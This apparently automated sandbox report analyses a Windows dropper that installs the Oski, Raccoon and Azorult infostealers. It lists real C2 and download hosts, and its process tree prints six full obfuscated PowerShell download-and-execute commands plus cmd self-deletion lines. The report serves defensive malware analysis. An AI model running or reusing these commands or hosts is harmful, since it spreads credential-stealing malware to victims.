Analysis

  • max time kernel
    120s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    29-10-2021 03:35

General

  • Target

    5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe

  • Size

    45KB

  • MD5

    6695ddd2891c24fc85a47ad37bd57f3f

  • SHA1

    648c4f0115f50e4186e44fade356f635dc995362

  • SHA256

    5edb1348236c7fa03dae6c9e2d3c9e4241c2eaa2a8721e5c4b78abc9b66075f8

  • SHA512

    51bc34f6b07df6bc8eaed91f85516441403c89c2260fcc1e7d359eed777dedf2339cc82ea4645535c7ad141a35f4b642e1bbfadbd4e6270f0ad2cbba30f91084

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/e5K4b

exe.dropper

http://bit.do/e5K4b

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://kfdhsa.ru/asdfg.exe

exe.dropper

http://kfdhsa.ru/asdfg.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bratiop.ru/asdfg.exe

exe.dropper

http://bratiop.ru/asdfg.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/e5K4M

exe.dropper

http://bit.do/e5K4M

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/e5K5i

exe.dropper

http://bit.do/e5K5i

Extracted

Family

oski

C2

scarsa.ac.ug

Extracted

Family

raccoon

Botnet

b76017a227a0d879dec7c76613918569d03892fb

Attributes
  • url4cnc

    http://telegka.top/brikitiki

    http://telegin.top/brikitiki

    https://t.me/brikitiki

rc4.plain
rc4.plain

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M5

    suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M5

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 14 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 29 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe
    "C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:820
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\EE93.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Users\Admin\AppData\Local\Temp\gen.exe
        gen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\gen.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:916
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\b1.hta"
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1548
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:568
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\b1a.hta"
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:952
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1376
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\b2.hta"
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:364
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL luhqmxbnvrt $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;luhqmxbnvrt pkzotxjl $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzotxjl;luhqmxbnvrt aiykpt $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs1aQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);aiykpt $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1632
              • C:\Users\Public\iqb.exe
                "C:\Users\Public\iqb.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2296
                • C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe
                  "C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2412
                  • C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe
                    "C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"
                    9⤵
                    • Executes dropped EXE
                    PID:2792
                • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
                  "C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2468
                  • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
                    "C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2612
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2612 & erase C:\Users\Admin\AppData\Local\Temp\Vereransa.exe & RD /S /Q C:\\ProgramData\\535056844654535\\* & exit
                      10⤵
                        PID:2064
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2612
                          11⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2112
                  • C:\Users\Public\iqb.exe
                    "C:\Users\Public\iqb.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2508
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\b2a.hta"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1756
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qjezygpm $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qjezygpm tykqrhcaxivo $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tykqrhcaxivo;qjezygpm yqvjfrouc $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);yqvjfrouc $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:856
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\m1.hta"
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1080
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
                6⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:344
                • C:\Users\Public\knc.exe
                  "C:\Users\Public\knc.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2256
                  • C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe
                    "C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2420
                    • C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe
                      "C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"
                      9⤵
                      • Executes dropped EXE
                      PID:1472
                  • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
                    "C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2476
                    • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
                      "C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:2712
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2712 & erase C:\Users\Admin\AppData\Local\Temp\Vereransa.exe & RD /S /Q C:\\ProgramData\\771519742962258\\* & exit
                        10⤵
                          PID:2572
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2712
                            11⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2588
                    • C:\Users\Public\knc.exe
                      "C:\Users\Public\knc.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:2528
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\m1a.hta"
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1312
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
                  6⤵
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1112
                  • C:\Users\Public\knc.exe
                    "C:\Users\Public\knc.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:2940

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Credentials in Files

      2
      T1081

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Collection

      Data from Local System

      2
      T1005

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\softokn3.dll
        MD5

        a2ee53de9167bf0d6c019303b7ca84e5

        SHA1

        2a3c737fa1157e8483815e98b666408a18c0db42

        SHA256

        43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

        SHA512

        45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

      • C:\ProgramData\softokn3.dll
        MD5

        a2ee53de9167bf0d6c019303b7ca84e5

        SHA1

        2a3c737fa1157e8483815e98b666408a18c0db42

        SHA256

        43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

        SHA512

        45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

      • C:\Users\Admin\AppData\Local\Temp\EE93.tmp\start.bat
        MD5

        210943872932de11fcdf7ea3723bc5c6

        SHA1

        1441e366faf476759ee83c868ed8c3fa6dddef49

        SHA256

        8e02b4a77db3465df283dca7afcbe9bcf1776763b63fd3dab5fd7e98316225e2

        SHA512

        9bb03b0d67b5f2e36c1560d136d21157b2b32c205349af4851a632c2924d2daed96ca70ddbe68cab47b18dc611b78da8902c34c6844c3b99bec7693a49db73d2

      • C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\b1.hta
        MD5

        e66d251ec771c96871b379e9190ff7a1

        SHA1

        37f14cd2f77b3f1877e266dc1f7e8df882119912

        SHA256

        2778e5c8e94981206b305108d42ac9c9d7be5f36eaf94cab2483120e9d3d3696

        SHA512

        4a8c886a828f61b031e9169886711da85d411535e2b6b1062614cd3fee4947fe340a60125dd0f30523a359ca677debbeba15ed55497e2bbe24787dfa5309ce88

      • C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\b1a.hta
        MD5

        5fc9f573414f4bdf535974dcc5812b87

        SHA1

        028b64ccbb98e650ee4909de019b0ff2da4cd138

        SHA256

        3b282cd60bc0c9689b4a68d2013f986e3534190042c8359be580db7004803118

        SHA512

        dfaaa82faa1ea65ed4da21bcebf7ca9821feef63b6ebb6b5d9ad40dd839520e2dffd4ed90fa10e2dbe670f377e6ad5bd59f4fcf115e29e693493325558ce253c

      • C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\b2.hta
        MD5

        68950206a64bdad979c35f5e4a67e8be

        SHA1

        d2789c3e940275ba2c30a6b5eb8c91da5751f1f9

        SHA256

        4864a18f70757f92fcf8631c918687e528768165dff70b8f5ebacd29a256e6bf

        SHA512

        8ca1391b917ff14b3c3b4f3145d9248b0ca154033646b9efbf3121d1a150ccfe5fad005a20f61b19ca95486e9d00caef9c12b98f5dba65a3a9ed84a6394c1d57

      • C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\b2a.hta
        MD5

        aad742136ab66a8cedceeb0d5175c249

        SHA1

        98103efcf3c76f5b5ba4ad208702ac49e8da1f4f

        SHA256

        63f208e5dc8a4bf02bb5ed4e65a8e187bfbbe43856d6546fdb49efa555b46af6

        SHA512

        23e0c5c6bb379610fe37ef64f5b3e49152c6d221229a6f4dc448d6076506f9c4b72e36691fa12d761c6fc32d96cba810e6ad6406d8ef6f29bd294cb951867093

      • C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\m1.hta
        MD5

        a75bddf46ecdadb3cbf1ff26a9c52c9e

        SHA1

        1c58d74bba1df1293494e248abd35d38153696df

        SHA256

        fc97cfcd0a76d1e8fbffb3c2ae137bdd08f5e05114c20c8049cc52d08421b287

        SHA512

        054464f5a10a4694ccfe3ec760e38afee83873d8b1d40b58bd1193a0f609ae57c0e7725c5a139dbdd61e8cd5b69f9ad1d1448aee03c594ee7d948a0fc8b4b5e8

      • C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\m1a.hta
        MD5

        f4db89dbe45cd8e7fb12009af13a9608

        SHA1

        b8682e5b10d93b32e01858355e50fd2c7daafde3

        SHA256

        48a17e20a2f884bf3d97e30a43bc7af1141832f28fc4feeb33ade73e4c9487aa

        SHA512

        b5df1b079ad5fda423a0bdd62bf2c0fb3c825ec3a237f36eef40bc4a572cf30bef2b434d448c93c52bfc1cbed3b1bc9b93b10ffe124f7cbd3f66f5aaa894b182

      • C:\Users\Admin\AppData\Local\Temp\EF4E.tmp\start2.bat
        MD5

        b775a1ac4fb96d9d35bbded9ea742f0c

        SHA1

        99b0c8d6cb5769f6aa2d292d4d9471d35ce66881

        SHA256

        d6956455e62011b28826a709db4e65a7b3595023512349d2681f22a07e6f1ce8

        SHA512

        85486d7b50a3ba35713b6f134286c2af35033ca392ef2b47d88516aafca6ea8cd245ce6be67e5c728fd539ed7da5c9a3291ed7b0b39cb5259939e84fb6a4052c

      • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
        MD5

        bbc3d625038de2cc64cbfdb76e888528

        SHA1

        75b19ab88f8c23d0088252e8c725d4ceea56895a

        SHA256

        3b8b57a0fa99b4d29b259e3641e967cbc84a314891273b56ce5bdeba30e49601

        SHA512

        9014f5d15f4e5311650e2b5357e72655c28cc64cb0dc7f1a37636270985a411a8baa26433f330d735850fe6a3dfe7479f70a9a52aa45c708879036ab1a1d3465

      • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
        MD5

        bbc3d625038de2cc64cbfdb76e888528

        SHA1

        75b19ab88f8c23d0088252e8c725d4ceea56895a

        SHA256

        3b8b57a0fa99b4d29b259e3641e967cbc84a314891273b56ce5bdeba30e49601

        SHA512

        9014f5d15f4e5311650e2b5357e72655c28cc64cb0dc7f1a37636270985a411a8baa26433f330d735850fe6a3dfe7479f70a9a52aa45c708879036ab1a1d3465

      • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
        MD5

        bbc3d625038de2cc64cbfdb76e888528

        SHA1

        75b19ab88f8c23d0088252e8c725d4ceea56895a

        SHA256

        3b8b57a0fa99b4d29b259e3641e967cbc84a314891273b56ce5bdeba30e49601

        SHA512

        9014f5d15f4e5311650e2b5357e72655c28cc64cb0dc7f1a37636270985a411a8baa26433f330d735850fe6a3dfe7479f70a9a52aa45c708879036ab1a1d3465

      • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
        MD5

        bbc3d625038de2cc64cbfdb76e888528

        SHA1

        75b19ab88f8c23d0088252e8c725d4ceea56895a

        SHA256

        3b8b57a0fa99b4d29b259e3641e967cbc84a314891273b56ce5bdeba30e49601

        SHA512

        9014f5d15f4e5311650e2b5357e72655c28cc64cb0dc7f1a37636270985a411a8baa26433f330d735850fe6a3dfe7479f70a9a52aa45c708879036ab1a1d3465

      • C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
        MD5

        bbc3d625038de2cc64cbfdb76e888528

        SHA1

